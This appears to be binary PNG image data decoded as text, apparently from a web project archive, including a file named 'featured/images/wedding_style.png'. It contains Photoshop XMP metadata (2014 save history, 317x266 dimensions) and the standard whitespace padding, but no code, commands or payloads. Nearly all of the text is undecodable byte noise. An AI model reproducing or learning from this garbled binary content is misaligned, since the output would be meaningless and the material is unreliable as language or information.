�<N����_��o��+����u�$���__��_�:��D4M%%V�ޘSY���E+e��3!)�UML�w����o����%+xӎ��zo��D9~|򇚗��:������{���q߻��ے��pxq��y"���U�i�C��%߿�P��:yc�}ϽN�׽�e�6���%{�Կ����Y�#�豥�+����	�f����_M�s��ԇC�h4�NJ��5�I��j̲��RҔ��0<�����}ipC?W��h/�=�y������~�&o��0^�H!%n�u=�
]ym�2M�A˲�
^Z�����a�M.�|��|i�H�E��A~5���m�f�a�T���0�X�r�9'��q�i2u����xbR���[�~G6p,�N�!�…���#��m���
øB�h>�g
鋿�j
��{��r��!�Xt�ټ�<H<f����O/�=b��Z/�S��Ͽ�y�w{�G�cW����A�G8��'t��~�˹�*-,��m�!�|]��Z��+��4����(�4^y|Cc����%�S���mFۖv��|J�u
=�·��׳�7l�3�IX�~�q:�C�p8L("
�żH�]�Oη���YkƏ-ˊ�&
�E2����Ff�[�U�1�`Ƽ;F�`g5s��3���H�/�$7B(i���h#��DR)�Q��ޔ�W��|��yKo�߯A���B��5a�^p
m�S�|[��‘��,𼶪��-�~�Ml�i�ho��ġs�fM877#���.πʄH�\ު��)f��:�p����Q��|Ә���xd)����ܘ����8� f�8����4M>Z��%�XF���D}��_��mg����8n
D�0x�~i��v�r��\1k*�|��b�t��C�n�}`���r�U�զ�Hd��io*��ע��P���ˊ����L(&�����U�U(K���N��p*="
�����`K�����TU]����H�[y��,]E��f��)TEa�
�7�H�ϚJM�V�e�v��[���6��~[!�U0Rttt����i��,&,�"�x��;��F��b��3�L]��O*h�ttt4���e������i����ih�[p��9:D4ME���d]�w���4(��������h�x<ޞiD�G^NE��g8�D�v�˅$�eb]]ݪh4zv<��i�4ߢا �G6agA�8p���
����Ѭ���{$�8�[�>�0�(��2"�H*BX�ź�?W��͹j}}��H$ry��Tf�C\���b婨w���wG8���ސ	!�2�Z]׋�Щ$����~����}��py.#���C�-!n/v�J��mݺ��@ p���S5M�^�>y�M�4�����S�<��U6m�43<�k4MCU�}f�;�]��h4I:����N��d��Z��hkk;:<���|>���2!��v����zF��DYZ���u?�߿���q���F�!�#�CV�Sb)pv.�x
���@KK����W��~UӴ��n2ȄȰil���|��e���?��D���>�o�#5dr��a��.�d�����U�7t]/���Q��f͚:M�n�4�>�Oq�����$9*���c�0��u:D���� �	�
\��zG��TQ��f͚cTU����;Z�4ET&G%���!���SQ��*�.�u��e+�E
�իW+���UU�Mӆ:݉s(��Cz�$�oq�.	I ��!
6�(�:�B��H�`���5��\�(�|UU9�B�^�C&�L�a���ڋ�T���9G��2���躞�=�BŒ�ASSS��{��\�(�GRx#���p�5�!� "����!*����&��%��PQ���‹���%-�>��nl79䏫d ��mo�-��\C�\�ǐBF0'�88W1V^����$�.��i>��G�"�~]�K�綀�#I!#N�f!�J�.#����&�'ۿO麾�����c{�;8Oq>�ہ�͌7�W�=�n-w����n�A
�F#�!�@`����9�N��a�6�ث�����5�6��C�Ї>�}�C�Ї=��Kq}�^,IEND�B`�featured/images/wedding_style.png000060400000433422152434416630013173 0ustar00�PNG


IHDR=
`䂈	pHYs��
MiCCPPhotoshop ICC profilexڝSwX��>�eVB��l�"#��Y��a�@Ņ�
V�HU�
H���(�gA��Z�U\8�ܧ�}z��������y��&��j9R�<:��OH�ɽ�H� ���g��yx~t�?��op�.$���P&W ��"��R�.T���S�d
�ly|B"�
��I>ة��آ���(G$@�`U�R,����@".���Y�2G��v�X�@`��B,� 8C� L�0ҿ�_p��H�˕͗K�3���w����!��l�Ba)f	�"���#H�L����8?������f�l��Ţ�k�o">!����N���_���p��u�k�[�Vh�]3�	�Z
�z��y8�@��P�<
�%b��0�>�3�o�~��@��z�q�@������qanv�R���B1n��#�Dž��)��4�\,��X��P"M�y�R�D!ɕ��2���	�w
��O�N���l�~��X�v@~�-��g42y�����@+͗����\��L�D��*�A�������aD@$�<B�
��AT�:��������18
��\��p`����	A�a!:�b��"���"aH4��� �Q"��r��Bj�]H#�-r9�\@���� 2����G1���Q�u@���Ơs�t4]���k��=�����K�ut}��c��1f��a\��E`�X&�c�X5V�5cX7v��a�$���^��l���GXLXC�%�#��W	��1�'"��O�%z��xb:��XF�&�!!�%^'_�H$ɒ�N
!%�2IIkH�H-�S�>�i�L&�m������ �����O�����:ň�L	�$R��J5e?���2B���Qͩ����:�ZIm�vP/S��4u�%͛Cˤ-��Кigi�h/�t�	݃E�З�k�����w
�
��Hb(k{��/�L�ӗ��T0�2�g��oUX*�*|���:�V�~��TUsU?�y�T�U�^V}�FU�P�	��թU��6��RwR�P�Q_��_���c
���F��H�Tc���!�2e�XB�rV�,k�Mb[���Lv�v/{LSCs�f�f�f��q�Ʊ��9ٜJ�!�
�{--?-��j�f�~�7�zھ�b�r�����up�@�,��:m:�u	�6�Q����u��>�c�y�	�����G�m������7046�l18c�̐c�k�i�����h���h��I�'�&�g�5x>f�ob�4�e�k<abi2ۤĤ��)͔k�f�Ѵ�t���,ܬج��9՜k�a�ټ����E��J�6�ǖږ|��M����V>VyV�V׬I�\�,�m�WlPW��:�˶�����v�m���)�)�Sn�1��
���9�a�%�m����;t;|rtu�vlp���4éĩ��Wgg�s��5�K���v�Sm���n�z˕��ҵ�����ܭ�m���=�}��M.��]�=�A��X�q�㝧�����/^v^Y^��O��&��0m���[��{`:>=e���>�>�z�����"�=�#~�~�~���;������y��N`������k��5��/>B	
Yr�o���c3�g,����Z�0�&L�����~o��L�̶��Gl��i��})*2�.�Q�Stqt�,֬�Y�g��񏩌�;�j�rvg�jlRlc웸�����x��E�t$	�����=��s�l�3��T�tc��ܢ����˞w<Y5Y�|8����?� BP/O�nM򄛅OE����Q���J<��V��8�;}C�h�OFu�3	OR+y���#�MVD�ެ��q�-9�����R
i��+�0�(�Of++�
�y�m�����#�s��l�Lѣ�R�PL/�+x[[x�H�HZ�3�f��#�|���P���ظxY��"�E�#�Sw.1]R�dxi��}�h˲��P�XRU�jy��R�ҥ�C+�W4�����n��Z�ca�dU�j��[V*�_�p�����F���WN_�|�ym���J����H��n��Y��J�jA�І�
���_mJ�t�zj��ʹ���5a5�[̶���6��z�]�V������&�ֿ�w{��;��켵+xWk�E}�n��ݏb���~ݸGwOŞ�{�{�E��jtolܯ���	mR6�H:p囀oڛ�w�pZ*�A�'ߦ|{�P������ߙ���Hy+�:�u�-�m�=���茣�^G���~�1�cu�5�W���(=�䂓�d���N?=ԙ�y�L��k]Q]�gCϞ?t�L�_�����]�p�"�b�%�K�=�=G~p��H�[o�e���W<�t�M�;����j��s��.]�y�����n&��%���v��w
�L�]z�x����������e�m�`�`��Y�	�����Ӈ��G�G�#F#���
��dΓ᧲���~V�y�s����K�X�����Ͽ�y��r﫩�:�#���y=���}���ǽ�(�@�P��cǧ�O�>�|��/���%ҟ3J�iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15        ">
   <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
      <rdf:Description rdf:about=""
            xmlns:xmp="http://ns.adobe.com/xap/1.0/"
            xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/"
            xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#"
            xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#"
            xmlns:dc="http://purl.org/dc/elements/1.1/"
            xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/"
            xmlns:tiff="http://ns.adobe.com/tiff/1.0/"
            xmlns:exif="http://ns.adobe.com/exif/1.0/">
         <xmp:CreatorTool>Adobe Photoshop CC (Windows)</xmp:CreatorTool>
         <xmp:CreateDate>2014-09-10T12:23:42+04:00</xmp:CreateDate>
         <xmp:ModifyDate>2014-09-11T12:36:48+04:00</xmp:ModifyDate>
         <xmp:MetadataDate>2014-09-11T12:36:48+04:00</xmp:MetadataDate>
         <xmpMM:DocumentID>xmp.did:cbd06755-ebee-5b4e-9a58-e7f2741aa911</xmpMM:DocumentID>
         <xmpMM:InstanceID>xmp.iid:bea0a315-f453-0649-89d5-2413ef1090ae</xmpMM:InstanceID>
         <xmpMM:OriginalDocumentID>F835D704AD8457116D51401F29CD822E</xmpMM:OriginalDocumentID>
         <xmpMM:History>
            <rdf:Seq>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>saved</stEvt:action>
                  <stEvt:instanceID>xmp.iid:c398d5b2-f4a3-8143-943e-63e796593901</stEvt:instanceID>
                  <stEvt:when>2014-09-10T12:25+04:00</stEvt:when>
                  <stEvt:softwareAgent>Adobe Photoshop CC (Windows)</stEvt:softwareAgent>
                  <stEvt:changed>/</stEvt:changed>
               </rdf:li>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>converted</stEvt:action>
                  <stEvt:parameters>from image/jpeg to application/vnd.adobe.photoshop</stEvt:parameters>
               </rdf:li>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>derived</stEvt:action>
                  <stEvt:parameters>converted from image/jpeg to application/vnd.adobe.photoshop</stEvt:parameters>
               </rdf:li>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>saved</stEvt:action>
                  <stEvt:instanceID>xmp.iid:cbd06755-ebee-5b4e-9a58-e7f2741aa911</stEvt:instanceID>
                  <stEvt:when>2014-09-10T12:25+04:00</stEvt:when>
                  <stEvt:softwareAgent>Adobe Photoshop CC (Windows)</stEvt:softwareAgent>
                  <stEvt:changed>/</stEvt:changed>
               </rdf:li>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>saved</stEvt:action>
                  <stEvt:instanceID>xmp.iid:d8be7153-2b96-6a44-a063-a2b261241b68</stEvt:instanceID>
                  <stEvt:when>2014-09-10T12:31:24+04:00</stEvt:when>
                  <stEvt:softwareAgent>Adobe Photoshop CC (Windows)</stEvt:softwareAgent>
                  <stEvt:changed>/</stEvt:changed>
               </rdf:li>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>converted</stEvt:action>
                  <stEvt:parameters>from application/vnd.adobe.photoshop to image/jpeg</stEvt:parameters>
               </rdf:li>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>derived</stEvt:action>
                  <stEvt:parameters>converted from application/vnd.adobe.photoshop to image/jpeg</stEvt:parameters>
               </rdf:li>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>saved</stEvt:action>
                  <stEvt:instanceID>xmp.iid:6bfa07ba-e60d-004b-a2e5-b54662c63b1c</stEvt:instanceID>
                  <stEvt:when>2014-09-10T12:31:24+04:00</stEvt:when>
                  <stEvt:softwareAgent>Adobe Photoshop CC (Windows)</stEvt:softwareAgent>
                  <stEvt:changed>/</stEvt:changed>
               </rdf:li>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>saved</stEvt:action>
                  <stEvt:instanceID>xmp.iid:10e8afa6-a62e-d945-a946-72c3e2e58676</stEvt:instanceID>
                  <stEvt:when>2014-09-11T12:36:48+04:00</stEvt:when>
                  <stEvt:softwareAgent>Adobe Photoshop CC (Windows)</stEvt:softwareAgent>
                  <stEvt:changed>/</stEvt:changed>
               </rdf:li>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>converted</stEvt:action>
                  <stEvt:parameters>from image/jpeg to image/png</stEvt:parameters>
               </rdf:li>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>derived</stEvt:action>
                  <stEvt:parameters>converted from image/jpeg to image/png</stEvt:parameters>
               </rdf:li>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>saved</stEvt:action>
                  <stEvt:instanceID>xmp.iid:bea0a315-f453-0649-89d5-2413ef1090ae</stEvt:instanceID>
                  <stEvt:when>2014-09-11T12:36:48+04:00</stEvt:when>
                  <stEvt:softwareAgent>Adobe Photoshop CC (Windows)</stEvt:softwareAgent>
                  <stEvt:changed>/</stEvt:changed>
               </rdf:li>
            </rdf:Seq>
         </xmpMM:History>
         <xmpMM:DerivedFrom rdf:parseType="Resource">
            <stRef:instanceID>xmp.iid:10e8afa6-a62e-d945-a946-72c3e2e58676</stRef:instanceID>
            <stRef:documentID>xmp.did:cbd06755-ebee-5b4e-9a58-e7f2741aa911</stRef:documentID>
            <stRef:originalDocumentID>F835D704AD8457116D51401F29CD822E</stRef:originalDocumentID>
         </xmpMM:DerivedFrom>
         <dc:format>image/png</dc:format>
         <photoshop:LegacyIPTCDigest>C75D17E574B56EF5DBBE3994C0E9795C</photoshop:LegacyIPTCDigest>
         <photoshop:ColorMode>3</photoshop:ColorMode>
         <photoshop:ICCProfile>sRGB IEC61966-2.1</photoshop:ICCProfile>
         <tiff:ImageWidth>317</tiff:ImageWidth>
         <tiff:ImageLength>266</tiff:ImageLength>
         <tiff:BitsPerSample>
            <rdf:Seq>
               <rdf:li>8</rdf:li>
               <rdf:li>8</rdf:li>
               <rdf:li>8</rdf:li>
            </rdf:Seq>
         </tiff:BitsPerSample>
         <tiff:PhotometricInterpretation>2</tiff:PhotometricInterpretation>
         <tiff:Orientation>1</tiff:Orientation>
         <tiff:SamplesPerPixel>3</tiff:SamplesPerPixel>
         <tiff:XResolution>720000/10000</tiff:XResolution>
         <tiff:YResolution>720000/10000</tiff:YResolution>
         <tiff:ResolutionUnit>2</tiff:ResolutionUnit>
         <exif:ExifVersion>0220</exif:ExifVersion>
         <exif:ColorSpace>1</exif:ColorSpace>
         <exif:PixelXDimension>317</exif:PixelXDimension>
         <exif:PixelYDimension>266</exif:PixelYDimension>
      </rdf:Description>
   </rdf:RDF>
</x:xmpmeta>
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                            
<?xpacket end="w"?>���� cHRMz%������u0�`:�o�_�F�IDATx��w�e�}ߋ~V����yzr �"E�2/�$*��$��e�\�%�>K�,�T�h%���k_?�%��"e��E�"M�bI$"��&���'��z�}N��({�f�s��}���_�~�?q��IW���Y;kg��+
эf���{_�o�8�5!RJ�s�CY��[w	!pΑeA��9���C)�s�/[�_��w�a�VPCH@�g9�t@�1��!�!q8�c��9�_D8$B��&��cAR����y��˿�sL~-���J]+ח��`X��܄�~+p&7Mz��8Q���:��+��v��9s�<�طo{���
!�־b?��Z�|�M�t�=:�=2��m�q�`��=hW/^���
Gdߞ��!��� �)W�,S�j���NS�*t;k��>���F�aw��(��*Zk��I�2?7G�
Y^�2;3��t���]L��cR667	�
�w��Nl��W�i��O����##J�s��
�������bK��t:|��_f~~�={�������>�s��{�"�1�����k9g���:����ٿ7#�&RɓԦ1:dnv�^g�/^���f��Z��c����wQA��MC�a�u�%�:)��ea�B���\����TLg�+��~�1������^VW;�ɀ� !OG���ۈ�]/�7v@�t8G^!�Z��	17��Ʒ�м�>��O?�޽{9r��9��&�v�'�x���Y�8����E�Xw�׿�	�p�0=5Û��v�M3JHC�ۡٞ���J�?���bui��k�,�6��5
�DQ@W�Bp�����;�Ab�O*q���i�ǟz���=��=����k4���:2�P:bߞR[�iN�"�kdN��܉m)�+��KW.�WzMo嘂^��(Ii4�T*��"�����kk�h25�~E�����z�'NP��nx�_��9v���ӓ��Z�S�����܎�Xk�Jo��x��(�4�RL�S�ַJ>�!��^GY��� ���*��2�o��޶/I�4%MS��"667�u�L������""��S��Z���,A�_�ё��Vy���9�R
�+++Xki�ۓ���ެ�Y/��v�oЕ�j�p�!�H���A���<MX__CFUj�!�*tG#(
�0 %t=f�w��!ˆ84Q�XY[#�6iT5�~�Qbh��	ȹ��N��&R�$+˜z���>���+9���*'�C ���n���q��y-PB��nR��d��u��"�R���h���V�0_�!��]��z+_��R233�p8�ܹs�ݻ����R?�o�RߡC��X�w�j�!�"�!
G\��<R8���y�j�F�Z#�BA"���PKF�M>���.�j̑#�iիl��2�v�z$pE����>x�G1&��㏰�q��!�͵)�����~N�o����Z��4�M��i�3Z�I2=U�Z��n�Hfg���,��A@_�d�f�z��䵯}-�Ν�ܹsA�]w�ťK�x�'�뮻ʚ��޾���+:��I
+�+#@�@⤛�H�"���A\�i�4}WU*�sTC˅��wQ؂Q��f?�Y��3la��1�0���|�<Y?#�)a �F!RG��3Oh��*`��G�u���"�o��ޘ��׭k�բ���5Μ9�w�A�V�9�S��Y_q�°��NT�(A�##�0�ZC�C:�M�<]�Zh6kt:� @kM�?D
A�VC)��a���&�~����2�֨��޷n���z;�k�D�ix{#�+��M͏��y��@O+}�������1Џ9z;͌��R`7nv����v�j�y�{��|���׷Oo{��v����(y��5�����v�v��~��|���/7?��n�_�n�{���o�n;ee�{��n>'^
�^
�^�ܹ����/�\;�۝����'��K���^޹�7�͠y�r"�o�
xG��-��ߜ���{1�z����9˖Ts��_1����|s��J_;��+�J]�An�-�Iow������b�ܖV��RۗJ��U�ǝH��,�%��'�Ų���eB*���Ss��R���"*�������3���;>v��ٱ~�۫���D�[�C[mB��_��;�k���S[��kV�0	rb`�2wu�@l������>�ʟKSX<xy��N�8��Cf����Y��gg��l�s!�/�n��Ke���Mo܁�U��C�o�c5�7wϵD�e�
�R�4�ˋ�An9���0T��kR����u�Y;��m]�C�-/�-p{!0���勻H�9$�+�gr�
��!���5�-p3���9�h
\�A`��.!u�T��[��5��#D!;���v@��T�	q#Y@9�ҍ#�q�'^vzZ��� |E�oj��r�?K�U	3gt-�7�>8�"���A�6�
��/9l�!~2���8���xv��B��0�pr���P7�dnb5$P/�8aq֡��xE�s�Z\��R��WV�Gok��ZDaẃU�+�A�J!�_��Cq�+ay)��������No�D8R�+�h�d���`�q�;�:P�z�59�	IJ��
��^2u�����Xx��*D�Ƕ�W��}����|a�?N��u>���o��sf|3������>�B᭹�t�ݸ�m���ً���gW�������ov��D<m�>���D�;	<ka�&q���>��>��̘�Rvw�Q�nBxQ�Fͷueg��+�&d�G3xO��h���I?�@���'�cޟ�ݖ�N����m&�n����{A��h7�=������!��A���#��!�dj�@�
!��Ek�e����#'������sg��V�6a��4"�	@����m9�OR�?�������)��}�XT�x�*e�ޕ���q@4�H+q�q��Qb\{)��͟���_�s�\��,���N��+є��j\(Ζ)���ոKr�m��˳�j�f]�K�N��h���/f��v"���k��qۍl��=�ᎀ��ԃq�M.i߈t[���b�p�dz��F���+,n)�9I}-'���bLӔK�.����k��\�v���՗������r&W+�<�"p�D�wU���	pB�N, *@C �,gG��,���/7�����׹t������ǿk��$��Y;��mq���T�x�� ��4n��>��E
'˒��.�fp3�/�=��Ys�_�J��9�t���~a[�{���ի��o����^�b]]]�~��>��|����/zQ��͑>�.�OLRLR��@"�؉��+���#��v/b�Ї���-�$������c�ۯj;��}{����3)ڻ7+�c�;�1�'��Q������� ��O'�
��V��I�P�Vw<��$'��ŗ�9�Νc}}�%��˗/����?�A��O��+^�/�<����|�?)�P�|�z�H�����2.\��1�}�Q�|�ɯ�Z;Q�NM��0�ݖ����('��9�O����My��i�w�p}p���}X"6,n�������-w���(4�~�����޽�8�����$�}��g��jH)���۩�j7\��N���9~��d��{��	��/��(�t�SSS��/���v�v��'�+>�����e�'2p"��˗.���]�v�h��!W�^�СC����e�$a���/��\�v��pȑ#G&�MOO���xC������:{��%C������ݿ��j��?b~~~2�}4q��Uv��5�m���z��ݍ���P?��B̗1�1�h9��{�2
%%D�S68vKD���9|w���b��e��x�/�!���8|���6���Z�ٳ�������ev��M�Ѡ(
��&+++���1�>�(���A@����5��
�޽{�|�2<��s�������#?�#�}���|���?�3.���[���8q���6�� �TJޝ��z��
r*dcc��|��/~	c
�}����v�0����,--��������7�����ܹs������ի����|�;QJq��)���F#>�p��e����w��V���v��Zky��ԧ>��˗Y\\�'�'ٽ{7���x�'���ݿ�}��ǩS���>�ŋٻw/�~��9|�����F9�v��k��G9cX�M�àlٽ��[�,�Z��
�O��1i�$4��Z���+����_bcc�'���'O�/�?��<�YYY�=�y<�?�?�����SO=ş�ɟ��~z���ۿ����w�����o���w�w'���>��"����Ə����p뭷r��Y~����'Op�����,/�p�}�p����O�����6�n��XļfP�����_�{��R��տⳟ�,��;�û�nΜ9�]w��G>�~�~����"C���Ͽ���x��}�c�������?�#����;��_�U~�7��(n�Ȇ�!�{�H��;3O���o�EQ�{�n�=���Ϋ^�*���s_�z�;3�������z��Kb'�6�W��)�+���1�Bb�Ԉ?Mr�m5%����c�n���̃�+�%�C��}}����]n;v����o��oyӛ��'>�����t:���$�;p�<�+++h��җ������7��C�q��YΜ9l
*���F���,`uu���ٟ�/��/طo���w��o��oN�'O�dymmہ�7�D n
���?ȧ?�9����λN���?���y��^Ǚ3g���������o}+����
~�g~f������o|#+++�<y�����o|#��{/��=��?�'��	�I)���O������o;�N����-<���LOO��?������V��o��䛾��{y���O��O�\;��S���	r�M����lx)��zp��"O���p� �Dlo�ƆH��Y�p������y�<�����{x�'������	�4
��w1	Ðw�������G~�G�"�U��xR��V����8p�������x.\�����w&��~��y��X[[cϞ=7�z����{�w�I��_z�"8u��^�#G��c?�cLOOO^�������s��u���<Y�1�������W�z�7��ͼ��o�ҥK�Z-���k�a��O2�t:���2���aii��`0�.�C?�C<��Ó��k_�Z}�ѝ�}�v�>��,�-���ީ�F�@X��j���HX��d��j́�+@��4��z��<������=�í����?N�Ѹ�=Yk�R�!Q�n�_�{c�
��Ǒ^ET*��o��V�a�enn�z���Q�x*����/@A�Vc`�.����733����0??O�EAQ�aH��eaa�yɣ�h���6/���u�4�!�;w���_�Kn��6B�n���|�n�ַw�^�$����H)�����;vl�����ߤ� J�����Ve+u8)�q�'p�!�;;N�=P��a/[D$�������É'^F�?�8�/_�]�z��,�x��'y�[�J������q�ш'�x�;�s
ہ#˲�j�:y��'�衇�7D�BxP������s��:?�#?v�W��dY6y/RJ���
��CJ�R�N�Åx���=�}��:u�Ç��}n���}�c�������$����?N����p�J)�����n�!B�Y�����f��[*9/��w	�U�K�ݫ/BAMLB
�
��O������9�����Y~���O����q��S|�㟠(
n��V����|��]���~>��S�T�T*�<y����fss���e��������ؠ������v�,--q��A����>��O��SO�g�g|�#���Qb`�E���7�?�8���w,�\gee����<��lnn��v'�ϲ����I4��tX]]%�s���O��?�~���5�^��/��/�h4����ҥK,--ᜣ��{�n����z�*����˟���Oh('O�duu�^�ǡC���_�%�x�	��.gΜ�������yK�����͝#��üR;[*��r����=��)�p��W�	��	�h(�G�hz�)1t���s�-�p���_�"˫+��?��ŋ���oczz���~�~�<�y��'YZZ��ѣ�s�=��5��Z�����9u��<���v�o�
�;�ɓ'�V��w�}<��S�j5���G|��gBp�}�q��q{�1>�я�裏��)Ǐgaa�cǎ�"�1C�8�8z�(����r�u~�Q��G8~�8�Ga����~��h��t:�>}�7��M�:�ɓ'�󜷽�m\�t�N��իW�~�:����g>ï���s�N�:�`0໿��i�����:�ш�}�sn����>�����?��?b0033�;��>��O��|���5�~N�>���6*��m围��>b��%��{��������,^� ����{�!�u
��~9G�[x[��<��B"��(	����Ӆ�;�It}}�����O�Q!+�w�k9x���m|�C��777Ǜ��&���<��?���,w�}7�fss����I4��k����&Ͻ����vr�s���lll�c?����?�.\��O��Oߐ��+p?D���?�QΟ���C��׿�J�¥K��V�LMMM�wKKK,..E1���I���˿���߿�����D��廾�&啕����GJ�'>�	�]����w��T�U�1�������2������IӔ����T�U�s�{��z뭓c�|������{�,�u9VU\0�� ~-B����4,�6��!����k9�����w DLmU��i�����x�/d�e
 �j{�O�&/
^}�]Xk���G������������)�s�ܯp� 4�
��+�S?�z,���g~�Q�V��_�5� ���a��ڀ�N#��;9��ȿ¯��=��U���7�����_�O�p@#�JA�+����{1��t�o��a�^wl�0�*��<�-Kw�m��1�Q�����FO<�$��8|�����?�����Z&�WRu�E��5�S��ط��hb��N�N�!�F���+�E���l!���+���Y;��
�o���;>9������\�].+�f����@sJ�O��_�p�=�_�����1d<O�O���L7؝DB�9�D.[$c pcs�h��!�?�4V!%o~�w��bu�7~�]��o{+ۄ�%���`(��1��}�[�qwn����l)�&-[oK��/�؏�)�Z���������PԻ��f��+9�*�Sj���1@�rlw	�_(��ܧ��j�[��L�w�)��-ܖd�n�a;bFn{/(P:��$�ǹ	��Kv�	[N��J�����>��v~�{���(?��~|��l9QF��s�����;�4��)u�B�bb��'���8�Ŕ��g��x����8��d���l'�T!�ٖ	yJm��`�%/J9�+P*�v���/#�ш"7TjU�*����8�}��V$���N�3`va�J��
~ō�m~�"dq��
`�x;������Ibi�.&�iǹ�Z��&�7������|�h���ql\X��;�Cwu�AwD&BZ$
���ѪWQ���l���g�/8v�n�+�N�+4�!�Ο�Թ%�/�9t�:����J�	�4��h�HF(�O�Q�n6X�p��������[����s(FFI���HFĵ
K�5��K����,�����	�f�3�������4��0.�Y�%CL�r��S�*Z13=���%pg���F�peOA��룍2}�&K''Ԗ2�r��[�M�I�-q����W��#'�ux�ٳ$�=��c�;8��?��|��+���L����_9K�H6�nΜ}�F��2	{���=�מ����Dr�6�����>i�ɞ�Y��!��МZ�-�.���@)�k_�z�W8��c��Ir��.vyA��y�A�������=��=��-������W/���{,�G�ښ�*n���<��+�?~���_~�AYƹN�.U����~ff�7D�;k�v�_qIo�q���܍q���تWMQ�]߲p�|���IZg�A�ָ��=t��0?�H�٢>�������q�mGH6W��)�}��a
*�Y[����{���"舅�w�{�Qm�a�#�Ì]��2ը�|�
�0$�!�G�6:��<���FPH�y�wD��5VW�T+� r�b�����ذ��OW�Q���{��{	3��Z���g�5k��3M� �7$g15�"��5��,�?����T*u�qZ|S�q�;��W��@�g��v'�]����ex�:�7�6�+HҜ8P�	�F��e@@($����1q���^�J�깃N�5$iJ\���b�$�5��dyJ%�����:��&:����@Zh�(��$#�-|��;2cB	�����LNn����#Cd&��F)Y�b�J��)�f)Jh
�ဨ�@b��(F)������z�r���Y;���vv���Y�Vk�v���Y;���v���Y;���v���Y;���v���Y;���v���Y�إ�scv��׹�ľɖ"x��^7?�7� ���-���"�Byq���>c-h)7�X�S�M�>��~����ׅ	Cp��T)s�~6�
l�-֟���O�7<��Xʕ#-�jౄ�9���� �cݰ�:d�
�[�<�“�r����"ls�)?��#?:��&���0#J���Pa����a��	al�����H
�tB�0��Fg@[
o$��	��y[�?���츽|ïWk�y���w��_�$
�R�^^ظ�(A���
�q
D)/�H<DP���	�(5��	��:��`=�����;)���Ki5�c�
VB��\�K+p�۔�"��*B��S�~���z��d<�.J��(L���������(�(��L>��ۍ?�N*V������B�7�+}=��-�Wnʁ�~��)��c�+�:��2'��MC��^a��H)��6��]�zw��cH�;��D]�7;d�o�J�휻aZ���Aϖu�:o�)�Hh2�6�����UFRV�,�������������B:���k�b&:��ƕ�80ƒ��p�a�[^h•�8g�Fyu�.-팷w���!1�"����͂(�7��9��2��>*���kW �*�c��͕Q��|T&�8���%��Z��i�Z�ʨKzw*�����������o����-��l��f�($kK vH)p���;�8�s�;`Sl�V��9N��V"0Πly
J�_��9��T���W�sh!ċ���Y/�,�&&���-cP��	���
��{�2���ARZH	���^3H�(S:'"���F�2:� ���H0�L?�V
��c$��K_�Ҩ���G;B�D�0���b+��3QB�{�ɱ�B�HQ�:c�>$B���H����njJ	�B���8e���ʜ�
�ʲf�-Ey%�t\���#3!=`Z'�hU`�@a�i'3��.�ο���o��&���ـ��+�#�x��?Kc��&����O��q|�F.!�N#�/}�u�,�9?�{��L�<��]Y�s8�ӯm��?�	�L�E	4B�������Q�FH��r_?rV�A8��n���kN��_�22U(�/P�RH�J\#��_M�`��%�����)�@*�T�,W��:c�e��>
*�n�<^~�u>Gieo�,~)�E*��;�*�����7V��
)���(�g*�����9ٿ�5e�fo� �Oy�cs���e��e�w��Qi9#�8QK�
���+��c����7���s��ɭ��dy�Za��tR"T�2#4��h��n)��u袄#�� �ˆ���B��t�ў��렕�"M:�i��$�I☙�b8�#e"��$�J�Q��� ��(J�Q�m�
